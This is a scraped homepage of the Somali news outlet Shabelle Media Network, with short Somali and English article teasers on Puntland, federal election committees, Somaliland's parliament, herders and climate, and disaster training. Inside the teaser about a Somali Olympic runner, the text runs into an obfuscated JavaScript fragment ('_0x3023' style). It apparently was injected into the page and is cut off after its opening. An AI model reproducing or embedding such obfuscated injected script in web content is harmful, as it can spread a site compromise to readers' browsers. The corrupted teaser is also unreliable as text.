Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Puntland oo kala qaaday maleeshiyaadkii ku dagaalamay Saax-Maygaag

Puntland ayaa ku guulaysatay in si rasmi ah loo kala qaado labadii dhinac ee ku dagaallamay tuulada Saax-Maygaag, kadib markii halkaas ay booqdeen mas’uuliyiin ka tirsan maamulkaasi. Mas’uuliyiinta oo kaashanaya odayaasha dhaqanka labada dhinac, ayaa fuliyay amarkii ka soo baxay Puntland oo ku saabsanaa in laga guuro dhammaan dhulka lagu dagaallamay. Cutubyo ka tirsan ciidamada Puntland, ayaa sidoo kale ku sugan...

Rooble oo kulan la yeeshay Madaxda Golaha Wada-tashiga Qaranka

Kulan fogaan arag ah oo ay caawa yeesheen Madaxda Golaha Wadatashiga Qaranka uuna shir guddoominayay Ra’iisul Wasaare Maxamed Xuseen Rooble ayaa looga wadahadlay dardargalinta howlaha doorashooyinka Dalka. Ra’iisul Wasaare Maxamed Xuseen Rooble ayaa Golaha uga warbixiyay halka ay mareyso xallinta khilaafka ka taagan doorashada hoggaanka Guddiga Maamulka Doorashada Gobollada Woqooyi ee Soomaaliland iyadoo goluhu si buuxda u taageeray dadaalada Ra’iisul...

Climate change and conflict threaten Somali herders

Ahmed Mohamud, an elderly pastoralist from Mudug region in north-central Somalia, has witnessed the devastations climate change has wrought in his ancestral village where livestock keeping has strong economic and cultural value to his folks. Mohamud belongs to a fading generation of Somali herders who have nostalgic memories of a bygone era when weather patterns were predictable, ensuring that fodder...

Somali Police Force trained in community policing to counter extremism.

The African Union Mission in Somalia (AMISOM) has commenced a week-long community policing training in Mogadishu, to boost the skills of the Somali Police Force (SPF) in countering violent extremism, through enhanced collaboration and partnership with the community. Facilitated by the AMISOM Police component, the training at the General Kahiye Police Academy in Mogadishu, for 25 SPF personnel, was jointly...

Xaniifa oo la kulantay guddiga loo saaray xaqiijinta qoondada haweenka

Wasiirka wasaaradda haweenka XFS Xaniifa Maxamed Ibraahim (Xaabsade) ayaa maanta kulan gaar ah la qaadatay guddiga loo xil-saaray xaqiijinta qoondada haweenka iyo ku xigeenka Ergayga Qaramada Midoobey ee Soomaaliya. Qoraal ay wasiir Xaniifa ka soo saartay kulankaas waxay ku tiri, “Waxaan maanta kulan laqaadanay aniga iyo gudiga xaqiijinta qoondada dumarka dhowaan Raisulwasaaraha magacaabay (Goodwill Ambsaddors) kuxigeenka Qaramada Midoobey DSRSG Anita...

Maxaa kasoo baxay kulankii Rooble & guddiga doorashada G/Waqooyi

Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble oo kulan la qaatay Guddiga doorashooyinka Xildhibaannada labada gole ee Gobollada Waqooyi, ayaa sheegay in xubnaha guddiga laga doonayo in ay ka madax banaanaadaan siyaasadda iyo aragtida dhinacyada, ayna si siman ugu adeegaan dhammaan muwaadiniinta u tartamaya kuraasta ay doorashadooda hagayaan. Ra’iisul Wasaaraha ayaa xusay in laga noqday doorashadii lagu murmay...

Golaha wakiilada Somaliland oo doortay guddoon cusub

Xildhibaanada golaha wakiilada Somaliland ayaa maanta oo Isniin ah doortay guddoomiye, ku xigeenadiisa koowaad iyo labaad, kadib doorasho ka dhacday magaalada Hargeysa. Guddoomiyaha cusub ee golaha wakiilada Somaliland ayaa waxaa loo doortay, Mduane Cabdirisaaq Khaliif Axmed oo ka sharraxnaa xisbiga mucaaradka ah ee Wadani. Cabdirisaaq ayaa 42 cod kaga guuleystay, Yaasiin Xaaji Maxamuud Faratoon oo isna metalayey xisbiga muxaafadka ah ee...

Soomaaliya oo gashay kalmaha ugu horreeya tartanka oradka

oomaaliya ayaa kamid noqotay 10-Wadan ee kaalmaha ugu horeya ka galay tartanka ciyaarta  oradada (Olympic) oo lagu qabatay Dalka Japan Cali idow Cali oo Soomaaliya ku matalayay tartanka ayaa galay kaalinta 10-aad isaga oo ka sara maray wadama badan oo ay ka mid yihiin Spain, Poland, Qatar iyo Brazil!. Cali ayaa sidaa ugu gudbay wareegga 2-aad ee tartanka   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...

RW Rooble oo la kulmayo guddiga doorashooyinka Gobollada Waqooyi

Ra’iisul Wasaaraha Xukuumadda Federaalka ah ee Soomaaliya ayaa lagu wadaa in uu maanta xafiiskiisa kulan kula qaato xubnaha Guddiga Doorashooyinka Xildhibaanada Gobolada Waqooyi. Ra’iisul Wasaare Maxamed Xuseen Rooble ayaa wado dadaal xoogan oo uu ku doonayo in doorashada xildhibaanada kasoo jeedo gobolada waqooyi ay ku dhacaan si cadaalad iyo sinaan leh. Xubnaha Guddiga Doorashooyinka ee Xildhibaanada kasoo jeedo Goboladda waqooyi ayaa...

Madaxweyne Siciid Deni oo loo diray dalab la xiriira doorashada Aqalka Sare

Guddiga maamulka doorashada heer dowlad Goboleed ee Puntland ayaa warqad codsi ah u diray Madaxwaynaha maamulkaasi Mudane Siciid Cabdullaahi Deni. Warqad kasoo baxday xafiiska guddoomiyaha guddiga, Cabdikariin Muuse Maxamed ayaa waxaa  Deni looga dalbaday inuu soo saaro liiska xubnaha u tartamaya Aqalka Sare. Sidoo kale guddiga ayaa shaaca ka qaaday in la joogo waqtigii lagu heshiiyey qabashada doorashada Golaha Aqalka Sare,...

WARAR KALE

SoDMA Sends Delegation for Flood Response Training in China

MOGADISHU, Somalia -- Somalia’s disaster management agency (SoDMA) and federal member state relief ministers held a farewell ceremony in Mogadishu for 25 officials who...

JSP oo Musharrax u magacaabay doorashada Galmudug

Muqdisho – Xarunta dhexe ee Ururka Caddaaladda iyo Wadajirka (JSP) ayaa lagu qabtay kulan muhiim ah oo Guddiga Fulinta ee ururka, kaas oo uu...

Somalia Sends Disaster Officials to China for Flood Response Training

MOGADISHU, Somalia — Somalia's disaster management agency on Saturday dispatched 25 officials to China for specialized training on flood preparedness and emergency response, as authorities...